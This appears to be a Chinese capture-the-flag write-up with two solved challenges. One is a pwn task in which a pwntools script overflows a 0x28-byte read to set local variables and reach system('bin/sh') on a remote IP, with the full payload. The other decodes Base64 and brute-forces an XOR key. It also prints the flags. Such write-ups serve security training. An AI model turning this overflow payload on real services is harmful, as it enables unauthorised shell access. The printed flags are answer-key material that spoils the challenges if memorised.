护网临时工
pwn
gettingstart
flag{4281a86e5b9ab0ae7940f38be574dc52}
IDA反编译,发现0x7FFFFFFFFFFFFFFFLL == v7 && 0.1 == v8时可以执行system("bin/sh")。
read(0, &buf, 0x28uLL)读入0x28个字节,会依次覆盖buf、v5-v8。v5v6 随便填,v7就写0x7FFFFFFFFFFFFFFF。v8是double型的0.1,自己写一个给double赋值0.1的C程序,用GDB得到0.1的double型在内存中的形式0x3fb999999999999a写进去。
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
# io = process("./task_gettingStart_ktQeERc")
io = remote("49.4.78.170", 31070)
payload1 = 'a' * 24 + p64(0x7FFFFFFFFFFFFFFF) + p64(0x3fb999999999999a)
print("--------------")
print(p64(0x7FFFFFFFFFFFFFFF))
print(p64(0x3fb999999999999a))
print("--------------")
io.recvuntil("you.\n")
io.sendline(payload1)
io.interactive()
io.close()
misc
迟来的签到题
flag{2F64B7656E77E0A0743C02ECAE9E2513}
txt中乱码最后一个有等号,推测是Base64。解码后仍是乱码,提示xor,让每一位和一个数异或,爆破在结果中找符合flag形式的提交。
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import base64
mess = b"AAoHAR1UIFBSJFFQU1AjUVEjVidWUVJVJVZUIyUnI18jVFNXVRs="
aft = base64.b64decode(mess)
aft = str(aft, encoding = "utf8")
print(aft)
for i in range(100, 200):
for j in aft:
print(chr(i^ord(j)), end='')
print()